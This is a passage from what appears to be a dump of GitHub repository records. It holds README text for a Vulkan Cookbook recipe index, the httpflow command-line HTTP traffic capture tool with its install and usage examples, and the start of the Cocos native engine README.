\n\n# [Recipes Library](./Library/Source%20Files/)\n\n## [Chapter 01 - Instance and Devices](./Library/Source%20Files/01%20Instance%20and%20Devices/)\n\n* [03 - Connecting with a Vulkan Loader library](./Library/Source%20Files/01%20Instance%20and%20Devices/03%20Connecting%20with%20a%20Vulkan%20Loader%20library.cpp)\n\n* [05 - Loading function exported from a Vulkan Loader library](./Library/Source%20Files/01%20Instance%20and%20Devices/05%20Loading%20function%20exported%20from%20a%20Vulkan%20Loader%20library.cpp)\n\n* [06 - Loading global-level functions](./Library/Source%20Files/01%20Instance%20and%20Devices/06%20Loading%20global-level%20functions.cpp)\n\n* [07 - Checking available Instance extensions](./Library/Source%20Files/01%20Instance%20and%20Devices/07%20Checking%20available%20Instance%20extensions.cpp)\n\n* [08 - Creating a Vulkan Instance](./Library/Source%20Files/01%20Instance%20and%20Devices/08%20Creating%20a%20Vulkan%20Instance.cpp)\n\n* [09 - Loading instance-level functions](./Library/Source%20Files/01%20Instance%20and%20Devices/09%20Loading%20instance-level%20functions.cpp)\n\n* [10 - Enumerating available physical devices](./Library/Source%20Files/01%20Instance%20and%20Devices/10%20Enumerating%20available%20physical%20devices.cpp)\n\n* [11 - Checking available device extensions](./Library/Source%20Files/01%20Instance%20and%20Devices/11%20Checking%20available%20device%20extensions.cpp)\n\n* [12 - Getting features and properties of a physical device](./Library/Source%20Files/01%20Instance%20and%20Devices/12%20Getting%20features%20and%20properties%20of%20a%20physical%20device.cpp)\n\n* [13 - Checking available queue families and their properties](./Library/Source%20Files/01%20Instance%20and%20Devices/13%20Checking%20available%20queue%20families%20and%20their%20properties.cpp)\n\n* [14 - Selecting index of a queue family with desired capabilities](./Library/Source%20Files/01%20Instance%20and%20Devices/14%20Selecting%20index%20of%20a%20queue%20family%20with%20desired%20capabilities.cpp)\n\n* [15 - Creating a logical device](./Library/Source%20Files/01%20Instance%20and%20Devices/15%20Creating%20a%20logical%20device.cpp)\n\n* [16 - Loading device-level functions](./Library/Source%20Files/01%20Instance%20and%20Devices/16%20Loading%20device-level%20functions.cpp)\n\n* [17 - Getting a device queue](./Library/Source%20Files/01%20Instance%20and%20Devices/17%20Getting%20a%20device%20queue.cpp)\n\n* [18 - Creating a logical device with geometry shaders and graphics queue](./Library/Source%20Files/01%20Instance%20and%20Devices/18%20Creating%20a%20logical%20device%20with%20geometry%20shaders%20and%20graphics%20queue.cpp)\n\n* [19 - Destroying a logical device](./Library/Source%20Files/01%20Instance%20and%20Devices/19%20Destroying%20a%20logical%20device.cpp)\n\n* [20 - Destroying a Vulkan Instance](./Library/Source%20Files/01%20Instance%20and%20Devices/20%20Destroying%20a%20Vulkan%20Instance.cpp)\n\n* [21 - Releasing a Vulkan Loader library](./Library/Source%20Files/01%20Instance%20and%20Devices/21%20Releasing%20a%20Vulkan%20Loader%20library.cpp)\n\n## [Chapter 02 - Image Presentation](./Library/Source%20Files/02%20Image%20Presentation/)\n\n* [01 - Creating a Vulkan Instance with WSI extensions enabled](./Library/Source%20Files/02%20Image%20Presentation/01%20Creating%20a%20Vulkan%20Instance%20with%20WSI%20extensions%20enabled.cpp)\n\n* [02 - Creating a presentation surface](./Library/Source%20Files/02%20Image%20Presentation/02%20Creating%20a%20presentation%20surface.cpp)\n\n* [03 - 
Selecting a queue family that supports presentation to a given surface](./Library/Source%20Files/02%20Image%20Presentation/03%20Selecting%20a%20queue%20family%20that%20supports%20presentation%20to%20a%20given%20surface.cpp)\n\n* [04 - Creating a logical device with WSI extensions enabled](./Library/Source%20Files/02%20Image%20Presentation/04%20Creating%20a%20logical%20device%20with%20WSI%20extensions%20enabled.cpp)\n\n* [05 - Selecting a desired presentation mode](./Library/Source%20Files/02%20Image%20Presentation/05%20Selecting%20a%20desired%20presentation%20mode.cpp)\n\n* [06 - Getting capabilities of a presentation surface](./Library/Source%20Files/02%20Image%20Presentation/06%20Getting%20capabilities%20of%20a%20presentation%20surface.cpp)\n\n* [07 - Selecting a number of swapchain images](./Library/Source%20Files/02%20Image%20Presentation/07%20Selecting%20a%20number%20of%20swapchain%20images.cpp)\n\n* [08 - Choosing a size of swapchain images](./Library/Source%20Files/02%20Image%20Presentation/08%20Choosing%20a%20size%20of%20swapchain%20images.cpp)\n\n* [09 - Selecting desired usage scenarios of swapchain images](./Library/Source%20Files/02%20Image%20Presentation/09%20Selecting%20desired%20usage%20scenarios%20of%20swapchain%20images.cpp)\n\n* [10 - Selecting a transformation of swapchain images](./Library/Source%20Files/02%20Image%20Presentation/10%20Selecting%20a%20transformation%20of%20swapchain%20images.cpp)\n\n* [11 - Selecting a format of swapchain images](./Library/Source%20Files/02%20Image%20Presentation/11%20Selecting%20a%20format%20of%20swapchain%20images.cpp)\n\n* [12 - Creating a swapchain](./Library/Source%20Files/02%20Image%20Presentation/12%20Creating%20a%20swapchain.cpp)\n\n* [13 - Getting handles of swapchain images](./Library/Source%20Files/02%20Image%20Presentation/13%20Getting%20handles%20of%20swapchain%20images.cpp)\n\n* [14 - Creating a swapchain with R8G8B8A8 format and a MAILBOX present mode](./Library/Source%20Files/02%20Image%20Presentation/14%20Creating%20a%20swapchain%20with%20R8G8B8A8%20format%20and%20a%20MAILBOX%20present%20mode.cpp)\n\n* [15 - Acquiring a swapchain image](./Library/Source%20Files/02%20Image%20Presentation/15%20Acquiring%20a%20swapchain%20image.cpp)\n\n* [16 - Presenting an image](./Library/Source%20Files/02%20Image%20Presentation/16%20Presenting%20an%20image.cpp)\n\n* [17 - Destroying a swapchain](./Library/Source%20Files/02%20Image%20Presentation/17%20Destroying%20a%20swapchain.cpp)\n\n* [18 - Destroying a presentation surface](./Library/Source%20Files/02%20Image%20Presentation/18%20Destroying%20a%20presentation%20surface.cpp)\n\n## [Chapter 03 - Command Buffers and Synchronization](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/)\n\n* [01 - Creating a command pool](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/01%20Creating%20a%20command%20pool.cpp)\n\n* [02 - Allocating command buffers](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/02%20Allocating%20command%20buffers.cpp)\n\n* [03 - Beginning a command buffer recording operation](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/03%20Beginning%20a%20command%20buffer%20recording%20operation.cpp)\n\n* [04 - Ending a command buffer recording operation](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/04%20Ending%20a%20command%20buffer%20recording%20operation.cpp)\n\n* [05 - Resetting a command 
buffer](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/05%20Resetting%20a%20command%20buffer.cpp)\n\n* [06 - Resetting a command pool](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/06%20Resetting%20a%20command%20pool.cpp)\n\n* [07 - Creating a semaphore](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/07%20Creating%20a%20semaphore.cpp)\n\n* [08 - Creating a fence](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/08%20Creating%20a%20fence.cpp)\n\n* [09 - Waiting for fences](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/09%20Waiting%20for%20fences.cpp)\n\n* [10 - Resetting fences](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/10%20Resetting%20fences.cpp)\n\n* [11 - Submitting command buffers to the queue](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/11%20Submitting%20command%20buffers%20to%20the%20queue.cpp)\n\n* [12 - Synchronizing two command buffers](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/12%20Synchronizing%20two%20command%20buffers.cpp)\n\n* [13 - Checking if processing of a submitted command buffer has finished](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/13%20Checking%20if%20processing%20of%20a%20submitted%20command%20buffer%20has%20finished.cpp)\n\n* [14 - Waiting until all commands submitted to a queue are finished](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/14%20Waiting%20until%20all%20commands%20submitted%20to%20a%20queue%20are%20finished.cpp)\n\n* [15 - Waiting for all submitted commands to be finished](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/15%20Waiting%20for%20all%20submitted%20commands%20to%20be%20finished.cpp)\n\n* [16 - Destroying a fence](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/16%20Destroying%20a%20fence.cpp)\n\n* [17 - Destroying a semaphore](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/17%20Destroying%20a%20semaphore.cpp)\n\n* [18 - Freeing command buffers](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/18%20Freeing%20command%20buffers.cpp)\n\n* [19 - Destroying a command pool](./Library/Source%20Files/03%20Command%20Buffers%20and%20Synchronization/19%20Destroying%20a%20command%20pool.cpp)\n\n## [Chapter 04 - Resources and Memory](./Library/Source%20Files/04%20Resources%20and%20Memory/)\n\n* [01 - Creating a buffer](./Library/Source%20Files/04%20Resources%20and%20Memory/01%20Creating%20a%20buffer.cpp)\n\n* [02 - Allocating and binding memory object to a buffer](./Library/Source%20Files/04%20Resources%20and%20Memory/02%20Allocating%20and%20binding%20memory%20object%20to%20a%20buffer.cpp)\n\n* [03 - Setting a buffer memory barrier](./Library/Source%20Files/04%20Resources%20and%20Memory/03%20Setting%20a%20buffer%20memory%20barrier.cpp)\n\n* [04 - Creating a buffer view](./Library/Source%20Files/04%20Resources%20and%20Memory/04%20Creating%20a%20buffer%20view.cpp)\n\n* [05 - Creating an image](./Library/Source%20Files/04%20Resources%20and%20Memory/05%20Creating%20an%20image.cpp)\n\n* [06 - Allocating and binding memory object to an image](./Library/Source%20Files/04%20Resources%20and%20Memory/06%20Allocating%20and%20binding%20memory%20object%20to%20an%20image.cpp)\n\n* [07 - Setting an image memory 
barrier](./Library/Source%20Files/04%20Resources%20and%20Memory/07%20Setting%20an%20image%20memory%20barrier.cpp)\n\n* [08 - Creating an image view](./Library/Source%20Files/04%20Resources%20and%20Memory/08%20Creating%20an%20image%20view.cpp)\n\n* [09 - Creating a 2D image and view](./Library/Source%20Files/04%20Resources%20and%20Memory/09%20Creating%20a%202D%20image%20and%20view.cpp)\n\n* [10 - Creating a layered 2D image with a CUBEMAP view](./Library/Source%20Files/04%20Resources%20and%20Memory/10%20Creating%20a%20layered%202D%20image%20with%20a%20CUBEMAP%20view.cpp)\n\n* [11 - Mapping, updating and unmapping host-visible memory](./Library/Source%20Files/04%20Resources%20and%20Memory/11%20Mapping,%20updating%20and%20unmapping%20host-visible%20memory.cpp)\n\n* [12 - Copying data between buffers](./Library/Source%20Files/04%20Resources%20and%20Memory/12%20Copying%20data%20between%20buffers.cpp)\n\n* [13 - Copying data from a buffer to an image](./Library/Source%20Files/04%20Resources%20and%20Memory/13%20Copying%20data%20from%20a%20buffer%20to%20an%20image.cpp)\n\n* [14 - Copying data from an image to a buffer](./Library/Source%20Files/04%20Resources%20and%20Memory/14%20Copying%20data%20from%20an%20image%20to%20a%20buffer.cpp)\n\n* [15 - Using staging buffer to update a buffer with a device-local memory bound](./Library/Source%20Files/04%20Resources%20and%20Memory/15%20Using%20staging%20buffer%20to%20update%20a%20buffer%20with%20a%20device-local%20memory%20bound.cpp)\n\n* [16 - Using staging buffer to update an image with a device-local memory bound](./Library/Source%20Files/04%20Resources%20and%20Memory/16%20Using%20staging%20buffer%20to%20update%20an%20image%20with%20a%20device-local%20memory%20bound.cpp)\n\n* [17 - Destroying an image view](./Library/Source%20Files/04%20Resources%20and%20Memory/17%20Destroying%20an%20image%20view.cpp)\n\n* [18 - Destroying an image](./Library/Source%20Files/04%20Resources%20and%20Memory/18%20Destroying%20an%20image.cpp)\n\n* [19 - Destroying a buffer view](./Library/Source%20Files/04%20Resources%20and%20Memory/19%20Destroying%20a%20buffer%20view.cpp)\n\n* [20 - Freeing a memory object](./Library/Source%20Files/04%20Resources%20and%20Memory/20%20Freeing%20a%20memory%20object.cpp)\n\n* [21 - Destroying a buffer](./Library/Source%20Files/04%20Resources%20and%20Memory/21%20Destroying%20a%20buffer.cpp)\n\n## [Chapter 05 - Descriptor Sets](./Library/Source%20Files/05%20Descriptor%20Sets/)\n\n* [01 - Creating a sampler](./Library/Source%20Files/05%20Descriptor%20Sets/01%20Creating%20a%20sampler.cpp)\n\n* [02 - Creating a sampled image](./Library/Source%20Files/05%20Descriptor%20Sets/02%20Creating%20a%20sampled%20image.cpp)\n\n* [03 - Creating a combined image sampler](./Library/Source%20Files/05%20Descriptor%20Sets/03%20Creating%20a%20combined%20image%20sampler.cpp)\n\n* [04 - Creating a storage image](./Library/Source%20Files/05%20Descriptor%20Sets/04%20Creating%20a%20storage%20image.cpp)\n\n* [05 - Creating a uniform texel buffer](./Library/Source%20Files/05%20Descriptor%20Sets/05%20Creating%20a%20uniform%20texel%20buffer.cpp)\n\n* [06 - Creating a storage texel buffer](./Library/Source%20Files/05%20Descriptor%20Sets/06%20Creating%20a%20storage%20texel%20buffer.cpp)\n\n* [07 - Creating a uniform buffer](./Library/Source%20Files/05%20Descriptor%20Sets/07%20Creating%20a%20uniform%20buffer.cpp)\n\n* [08 - Creating a storage buffer](./Library/Source%20Files/05%20Descriptor%20Sets/08%20Creating%20a%20storage%20buffer.cpp)\n\n* [09 - Creating an input 
attachment](./Library/Source%20Files/05%20Descriptor%20Sets/09%20Creating%20an%20input%20attachment.cpp)\n\n* [10 - Creating a descriptor set layout](./Library/Source%20Files/05%20Descriptor%20Sets/10%20Creating%20a%20descriptor%20set%20layout.cpp)\n\n* [11 - Creating a descriptor pool](./Library/Source%20Files/05%20Descriptor%20Sets/11%20Creating%20a%20descriptor%20pool.cpp)\n\n* [12 - Allocating descriptor sets](./Library/Source%20Files/05%20Descriptor%20Sets/12%20Allocating%20descriptor%20sets.cpp)\n\n* [13 - Updating descriptor sets](./Library/Source%20Files/05%20Descriptor%20Sets/13%20Updating%20descriptor%20sets.cpp)\n\n* [14 - Binding descriptor sets](./Library/Source%20Files/05%20Descriptor%20Sets/14%20Binding%20descriptor%20sets.cpp)\n\n* [15 - Creating descriptors with a texture and a uniform buffer](./Library/Source%20Files/05%20Descriptor%20Sets/15%20Creating%20descriptors%20with%20a%20texture%20and%20a%20uniform%20buffer.cpp)\n\n* [16 - Freeing descriptor sets](./Library/Source%20Files/05%20Descriptor%20Sets/16%20Freeing%20descriptor%20sets.cpp)\n\n* [17 - Resetting a descriptor pool](./Library/Source%20Files/05%20Descriptor%20Sets/17%20Resetting%20a%20descriptor%20pool.cpp)\n\n* [18 - Destroying a descriptor pool](./Library/Source%20Files/05%20Descriptor%20Sets/18%20Destroying%20a%20descriptor%20pool.cpp)\n\n* [19 - Destroying a descriptor set layout](./Library/Source%20Files/05%20Descriptor%20Sets/19%20Destroying%20a%20descriptor%20set%20layout.cpp)\n\n* [20 - Destroying a sampler](./Library/Source%20Files/05%20Descriptor%20Sets/20%20Destroying%20a%20sampler.cpp)\n\n## [Chapter 06 - Render Passes and Framebuffers](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/)\n\n* [01 - Specifying attachments descriptions](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/01%20Specifying%20attachments%20descriptions.cpp)\n\n* [02 - Specifying subpass descriptions](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/02%20Specifying%20subpass%20descriptions.cpp)\n\n* [03 - Specifying dependencies between subpasses](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/03%20Specifying%20dependencies%20between%20subpasses.cpp)\n\n* [04 - Creating a render pass](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/04%20Creating%20a%20render%20pass.cpp)\n\n* [05 - Creating a framebuffer](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/05%20Creating%20a%20framebuffer.cpp)\n\n* [06 - Preparing a render pass for geometry rendering and postprocess subpasses](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/06%20Preparing%20a%20render%20pass%20for%20geometry%20rendering%20and%20postprocess%20subpasses.cpp)\n\n* [07 - Preparing a render pass and a framebuffer with color and depth attachments](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/07%20Preparing%20a%20render%20pass%20and%20a%20framebuffer%20with%20color%20and%20depth%20attachments.cpp)\n\n* [08 - Beginning a render pass](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/08%20Beginning%20a%20render%20pass.cpp)\n\n* [09 - Progressing to the next subpass](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/09%20Progressing%20to%20the%20next%20subpass.cpp)\n\n* [10 - Ending a render pass](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/10%20Ending%20a%20render%20pass.cpp)\n\n* [11 - Destroying a 
framebuffer](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/11%20Destroying%20a%20framebuffer.cpp)\n\n* [12 - Destroying a render pass](./Library/Source%20Files/06%20Render%20Passes%20and%20Framebuffers/12%20Destroying%20a%20render%20pass.cpp)\n\n## [Chapter 08 - Graphics and Compute Pipelines](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/)\n\n* [01 - Creating a shader module](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/01%20Creating%20a%20shader%20module.cpp)\n\n* [02 - Specifying pipeline shader stages](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/02%20Specifying%20pipeline%20shader%20stages.cpp)\n\n* [03 - Specifying pipeline vertex input state](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/03%20Specifying%20pipeline%20vertex%20input%20state.cpp)\n\n* [04 - Specifying pipeline input assembly state](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/04%20Specifying%20pipeline%20input%20assembly%20state.cpp)\n\n* [05 - Specifying pipeline tessellation state](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/05%20Specifying%20pipeline%20tessellation%20state.cpp)\n\n* [06 - Specifying pipeline viewport and scissor test state](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/06%20Specifying%20pipeline%20viewport%20and%20scissor%20test%20state.cpp)\n\n* [07 - Specifying pipeline rasterization state](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/07%20Specifying%20pipeline%20rasterization%20state.cpp)\n\n* [08 - Specifying pipeline multisample state](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/08%20Specifying%20pipeline%20multisample%20state.cpp)\n\n* [09 - Specifying pipeline depth and stencil state](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/09%20Specifying%20pipeline%20depth%20and%20stencil%20state.cpp)\n\n* [10 - Specifying pipeline blend state](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/10%20Specifying%20pipeline%20blend%20state.cpp)\n\n* [11 - Specifying pipeline dynamic states](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/11%20Specifying%20pipeline%20dynamic%20states.cpp)\n\n* [12 - Creating a pipeline layout](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/12%20Creating%20a%20pipeline%20layout.cpp)\n\n* [13 - Specifying graphics pipeline creation parameters](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/13%20Specifying%20graphics%20pipeline%20creation%20parameters.cpp)\n\n* [14 - Creating a pipeline cache object](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/14%20Creating%20a%20pipeline%20cache%20object.cpp)\n\n* [15 - Retrieving data from a pipeline cache](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/15%20Retrieving%20data%20from%20a%20pipeline%20cache.cpp)\n\n* [16 - Merging multiple pipeline cache objects](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/16%20Merging%20multiple%20pipeline%20cache%20objects.cpp)\n\n* [17 - Creating graphics pipelines](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/17%20Creating%20graphics%20pipelines.cpp)\n\n* [18 - Creating a compute pipeline](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/18%20Creating%20a%20compute%20pipeline.cpp)\n\n* [19 - Binding a pipeline 
object](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/19%20Binding%20a%20pipeline%20object.cpp)\n\n* [20 - Creating a pipeline layout with a combined image sampler, a buffer and push constant ranges](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/20%20Creating%20a%20pipeline%20layout%20with%20a%20combined%20image%20sampler,%20a%20buffer%20and%20push%20constant%20ranges.cpp)\n\n* [21 - Creating a graphics pipeline with vertex and fragment shaders, depth test enabled, and with dynamic viewport and scissor tests](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/21%20Creating%20a%20graphics%20pipeline%20with%20vertex%20and%20fragment%20shaders,%20depth%20test%20enabled,%20and%20with%20dynamic%20viewport%20and%20scissor%20tests.cpp)\n\n* [22 - Creating multiple graphics pipelines on multiple threads](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/22%20Creating%20multiple%20graphics%20pipelines%20on%20multiple%20threads.cpp)\n\n* [23 - Destroying a pipeline](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/23%20Destroying%20a%20pipeline.cpp)\n\n* [24 - Destroying a pipeline cache](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/24%20Destroying%20a%20pipeline%20cache.cpp)\n\n* [25 - Destroying a pipeline layout](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/25%20Destroying%20a%20pipeline%20layout.cpp)\n\n* [26 - Destroying a shader module](./Library/Source%20Files/08%20Graphics%20and%20Compute%20Pipelines/26%20Destroying%20a%20shader%20module.cpp)\n\n## [Chapter 09 - Command Recording and Drawing](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/)\n\n* [01 - Clearing a color image](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/01%20Clearing%20a%20color%20image.cpp)\n\n* [02 - Clearing a depth-stencil image](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/02%20Clearing%20a%20depth-stencil%20image.cpp)\n\n* [03 - Clearing render pass attachments](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/03%20Clearing%20render%20pass%20attachments.cpp)\n\n* [04 - Binding vertex buffers](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/04%20Binding%20vertex%20buffers.cpp)\n\n* [05 - Binding an index buffer](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/05%20Binding%20an%20index%20buffer.cpp)\n\n* [06 - Providing data to shaders through push constants](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/06%20Providing%20data%20to%20shaders%20through%20push%20constants.cpp)\n\n* [07 - Setting viewport state dynamically](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/07%20Setting%20viewport%20state%20dynamically.cpp)\n\n* [08 - Setting scissor state dynamically](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/08%20Setting%20scissor%20state%20dynamically.cpp)\n\n* [09 - Setting line width state dynamically](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/09%20Setting%20line%20width%20state%20dynamically.cpp)\n\n* [10 - Setting depth bias state dynamically](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/10%20Setting%20depth%20bias%20state%20dynamically.cpp)\n\n* [11 - Setting blend constants state dynamically](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/11%20Setting%20blend%20constants%20state%20dynamically.cpp)\n\n* [12 - Drawing a 
geometry](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/12%20Drawing%20a%20geometry.cpp)\n\n* [13 - Drawing an indexed geometry](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/13%20Drawing%20an%20indexed%20geometry.cpp)\n\n* [14 - Dispatching compute work](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/14%20Dispatching%20compute%20work.cpp)\n\n* [15 - Executing secondary command buffer inside a primary command buffer](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/15%20Executing%20secondary%20command%20buffer%20inside%20a%20primary%20command%20buffer.cpp)\n\n* [16 - Recording a command buffer that draws a geometry with dynamic viewport and scissor states](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/16%20Recording%20a%20command%20buffer%20that%20draws%20a%20geometry%20with%20dynamic%20viewport%20and%20scissor%20states.cpp)\n\n* [17 - Recording command buffers on multiple threads](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/17%20Recording%20command%20buffers%20on%20multiple%20threads.cpp)\n\n* [18 - Preparing a single frame of animation](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/18%20Preparing%20a%20single%20frame%20of%20animation.cpp)\n\n* [19 - Increasing the performance through increasing the number of separately rendered frames](./Library/Source%20Files/09%20Command%20Recording%20and%20Drawing/19%20Increasing%20the%20performance%20through%20increasing%20the%20number%20of%20separately%20rendered%20frames.cpp)\n\n## [Chapter 10 - Helper Recipes](./Library/Source%20Files/10%20Helper%20Recipes/)\n\n* [01 - Preparing a translation matrix](./Library/Source%20Files/10%20Helper%20Recipes/01%20Preparing%20a%20translation%20matrix.cpp)\n\n* [02 - Preparing a rotation matrix](./Library/Source%20Files/10%20Helper%20Recipes/02%20Preparing%20a%20rotation%20matrix.cpp)\n\n* [03 - Preparing a scaling matrix](./Library/Source%20Files/10%20Helper%20Recipes/03%20Preparing%20a%20scaling%20matrix.cpp)\n\n* [04 - Preparing a perspective projection matrix](./Library/Source%20Files/10%20Helper%20Recipes/04%20Preparing%20a%20perspective%20projection%20matrix.cpp)\n\n* [05 - Preparing an orthographic projection matrix](./Library/Source%20Files/10%20Helper%20Recipes/05%20Preparing%20an%20orthographic%20projection%20matrix.cpp)\n\n* [06 - Loading texture data from a file](./Library/Source%20Files/10%20Helper%20Recipes/06%20Loading%20texture%20data%20from%20a%20file.cpp)\n\n* [07 - Loading a 3D model from an OBJ file](./Library/Source%20Files/10%20Helper%20Recipes/07%20Loading%20a%203D%20model%20from%20an%20OBJ%20file.cpp)\n### Download a free PDF\n\n If you have already purchased a print or Kindle version of this book, you can get a DRM-free PDF version at no cost.
Simply click on the link to claim your free PDF.
\n

https://packt.link/free-ebook/9781786468154

", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "six-ddc/httpflow", "link": "https://github.com/six-ddc/httpflow", "tags": ["tcpdump", "capture", "http", "traffic-analysis", "pcap-files"], "stars": 646, "description": "A command line utility helps to capture and dump HTTP stream", "lang": "C++", "repo_lang": "", "readme": "# httpflow\n\n[![Build Status](https://travis-ci.org/six-ddc/httpflow.svg?branch=master)](https://travis-ci.org/six-ddc/httpflow)\n\n[![asciicast](https://asciinema.org/a/scdzwLDNytSPHtpbu1ECSv5FV.svg)](https://asciinema.org/a/scdzwLDNytSPHtpbu1ECSv5FV)\n\n## Installation\n\n### MacOs\n\n```bash\nbrew update\nbrew install httpflow\n```\n\n### Linux\n\n* Install [zlib](http://www.zlib.net/), [pcap](http://www.tcpdump.org/), [pcre](http://pcre.org/)\n\n```bash\n## On CentOS\nyum update\nyum install libpcap-devel zlib-devel pcre-devel\n\n## On Ubuntu / Debian\napt-get update\napt-get install libpcap-dev zlib1g-dev libpcre3 libpcre3-dev\n```\n\n* Building httpflow\n\n```bash\n> git clone https://github.com/six-ddc/httpflow\n> cd httpflow && make && make install\n```\n\nor directly download [Release](https://github.com/six-ddc/httpflow/releases) binary file.\n\n## Usage\n\n```\nlibpcap version libpcap version 1.9.1\nhttpflow version 0.0.9\n\nUsage: httpflow [-i interface | -r pcap-file] [-u url-filter] [-w output-path] [expression]\n\n -i interface Listen on interface, This is same as tcpdump 'interface'\n -r pcap-file Read packets from file (which was created by tcpdump with the -w option)\n Standard input is used if file is '-'\n -u url-filter Matches which urls will be dumped\n -w output-path Write the http request and response to a specific directory\n\n expression Selects which packets will be dumped, The format is the same as tcpdump's 'expression' argument\n If filter expression is given, only packets for which expression is 'true' will be dumped\n For the expression syntax, see pcap-filter(7)\n\n For more information, see https://github.com/six-ddc/httpflow\n```\n\n* Capture default interface\n\n```bash\n> httpflow\n```\n\n* Capture all interfaces\n\n```bash\n> httpflow -i any\n```\n\n* Use the expression to filter the capture results\n\n```bash\n# If no expression is given, all packets on the net will be dumped.\n# For the expression syntax, see pcap-filter(7).\n> httpflow host httpbin.org or host baidu.com\n```\n\n* Use the regexp to filter request urls\n\n```bash\n> httpflow -u '/user/[0-9]+'\n```\n\n* Read packets from pcap-file\n\n```bash\n# tcpdump -w a.cap\n> httpflow -r a.cap\n```\n\n* Read packets from input\n\n```bash\n> tcpdump -w - | httpflow -r -\n```\n\n* Write the HTTP request and response to directory `/tmp/http`\n\n```bash\n> httpflow -w /tmp/http\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cocos/engine-native", "link": "https://github.com/cocos/engine-native", "tags": ["cocos", "cocos2d", "game-engine", "game-development", "rendering", "3d", "vulkan", "metal", "ios"], "stars": 646, "description": "Native engine for Cocos Creator v2.x", "lang": "C++", "repo_lang": "", "readme": "Cocos native engine for Cocos Creator v2.x\n==========================\n\n\"Build\n\nIt is based on [cocos2d-x](https://github.com/cocos2d/cocos2d-x)[version 3.9], but remove 3D and other features. 
